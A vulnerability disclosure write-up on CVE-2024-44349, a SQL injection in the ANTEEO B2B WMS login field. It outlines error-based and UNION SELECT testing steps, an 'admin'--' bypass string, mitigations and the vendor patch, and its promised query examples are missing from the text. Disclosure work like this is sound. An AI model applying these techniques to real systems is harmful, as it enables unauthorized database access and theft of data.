Analysis on a new vulnerability: CVE-2024-44349
Abstract
During a black-box penetration test, we encountered a vulnerability in a software system, which allowed unauthorized access to sensitive information. Upon identifying the issue, we promptly informed the relevant parties and took steps to initiate a formal process for addressing the vulnerability through recognized security channels. This article will explore the steps taken to identify the risk and the broader implications of such security weaknesses.
CVE Introduction
We refer to the OWASP framework when conducting Web Penetration Tests for clients. According to OWASP, SQL injection (SQLi) is defined as follow: “A SQL injection attack consists of the insertion or ‘injection’ of a SQL query via input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administrative operations on the database (such as shutting down the DBMS), recover the content of a file from the DBMS file system, and in some cases, issue commands to the operating system.”
The discovered CVE is critical for companies using this WMS due to the following reasons:
Privilege escalation: Attackers can execute SQL commands directly on the database underlying the web application without requiring elevated privileges.
Network-based attack vector: The vulnerability can be exploited remotely, making it accessible from any location.
Credential exploitation: With sufficient effort and the right conditions, attackers can discover or create valid user credentials to gain access to the web application.
This vulnerability severely compromises the CIA triad —Confidentiality, Integrity, and Availability— which is the core principle of cybersecurity. Additionally, since the affected companies fall under EU regulations, they must adhere to GDPR requirements. If a threat actor exploits this vulnerability to extract sensitive information, both the company using the software and the company releasing it are obligated to inform the relevant Data Protection Authority without delay.
Description
Organizations using ANTEEO B2B WMS Software versions 4.7.x up to (but excluding) v4.7.34 are vulnerable to CVE-2024-44349, putting their data at significant risk. Below is an analysis of how this vulnerability impacts the core principles of the CIA triad:
Confidentiality: This vulnerability compromises confidentiality, as it allows unauthorized users to read database content by executing SELECT queries without authentication or elevated permissions.
Integrity: The vulnerability was identified in a production environment, limiting the scope of our testing. However, based on our findings, it is highly likely that both the UPDATE and INSERT functions can be exploited to modify data. We did not test the DELETE function due to the sensitive state of the production environment, but it remains a potential risk.
Availability: Attackers can disrupt system availability by executing SQL commands, such as the SLEEP function, which can lead to a denial-of-service (DoS) by overwhelming the application with resource-intensive queries.
Additionally, through SQL queries, attackers cannot only access data directly related to the software but also extract information about the underlying infrastructure hosting the application.
To exploit the SQL injection vulnerability, we utilized error-based SQLi, as direct output was not available. As PortSwigger explains: “Error-based SQL injection refers to cases where you’re able to use error messages to either extract or infer sensitive data from the database, even in blind contexts. The possibilities depend on the configuration of the database and the types of errors you’re able to trigger.”
Analysis
This section outlines the techniques used to exploit the SQL injection vulnerability. We began by identifying the vulnerability using special characters in the username field:
By entering a single quote (‘) into the username field, we triggered an SQL exception: “Incorrect syntax near ‘SELECT’.” to start. This error confirmed that the field is vulnerable to SQL injection (SQLi).
Given that this is a login portal, we hypothesized that the underlying SQL query might resemble something like this:
To exploit the SQL injection, we focused on manipulating the $username_field. Our initial attempt to bypass authentication involved using the following string:
We entered admin’–, which is designed to comment out the remainder of the query and log in as the admin user. However, this resulted in an error.
We also tested several common usernames (such as Administrator and superuser) but received the same output for each request. Due to the risk of causing a denial of service (DoS) in the production environment, we limited the number of logins attempts and shifted focus to extracting information from the database. To dump information from the database, we used a UNION SELECT query and needed to determine the number of columns returned by the initial SELECT statement. Unfortunately, we do not have screenshots of the process; however, iterative testing revealed that the query returns three columns.
Here’s an example of how we identified this:
Next, we focused on identifying the DBMS used by ANTEEO WMS. To do this, we examined one of the POST requests captured by a web proxy tool, such as CAIDO or Burp Suite.
From the POST requests, we observed that the web application operates on ASP.NET AJAX, indicating a likely use of Microsoft SQL Server. To confirm this, we executed the following query:
This query cast a string containing the MSSQL version information as an integer, intentionally raising an exception. The exception was then displayed in the webpage modal.
With this simple query, we confirmed the following information about the system running ANTEEO WMS:
- Database: Microsoft SQL Server 2019, version 15.0.216.2
- Operating System: Windows Server 2022, version 10.0
Based on this, we developed a Proof of Concept (PoC), which can be viewed on GitHub PoC CVE-2024-44349, to facilitate further testing and enumeration. Below is an example from the code, demonstrating how the PoC sends the SQL query:
Risk/Impact Assessment
Due to confidentiality concerns, we are unable to disclose the specific data extracted by the PoC. However, we were successfully able to enumerate the following:
- Databases present on the server
- Tables and views within each database
- Columns of each accessible table
- Contents of the accessible tables
- Information regarding the domain, service accounts, and host used by the company hosting the software
By exploiting this vulnerability, malicious actors could potentially access sensitive information, including user credentials and password hashes, which could lead to further compromise of the affected systems.
Mitigation Strategies
To prevent SQL injection vulnerabilities, it is critical to sanitize and validate all input fields thoroughly. Implementing strong input validation ensures that no malicious code can be injected into the system. Additionally, deploying Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) can help identify and block potential SQL injection attempts in real-time, reducing the risk of compromise. Furthermore, ingesting application logs into a Security Information and Event Management (SIEM) system and analyzing them with the help of the Security Operation Center (SOC) can lead to identify the attempts to dump the information. To further mitigate the damage of a successful SQL injection attack, it is essential to limit the privileges assigned to each database account. By ensuring that accounts have only the minimum necessary permissions, you can significantly reduce the impact of any unauthorized access. We strongly recommend updating the system to the latest version, which contains patches for known vulnerabilities. However, if updating is not immediately feasible, consider placing the application behind a Web Application Firewall (WAF) and restricting external access as much as possible to limit the attack surface.
After the vulnerability notification, the vendor promptly patched the issue in version 4.7.34. However, it is highly recommended to upgrade to version 5.0 for enhanced security and additional protections.
Conclusion
In this report, we outlined the process by which we discovered and exploited a critical vulnerability in the ANTEEO B2B WMS software. Following our findings, we submitted a request to the MITRE organization, resulting in the assignment of CVE-2024-44349. This vulnerability allows threat actors to inject malicious SQL commands via the username parameter, enabling them to access and disclose sensitive data from the underlying database. The vulnerability affects versions 4.7.x through 4.7.34 (excluded) of the ANTEEO B2B WMS. CVE-2024-44349 represents a significant security risk and, if exploited, could lead to unauthorized data access and system compromise. Organizations using the affected versions must prioritize patching their systems, enhance monitoring, and implement security best practices to mitigate the potential risks associated with this vulnerability and protect against future threats.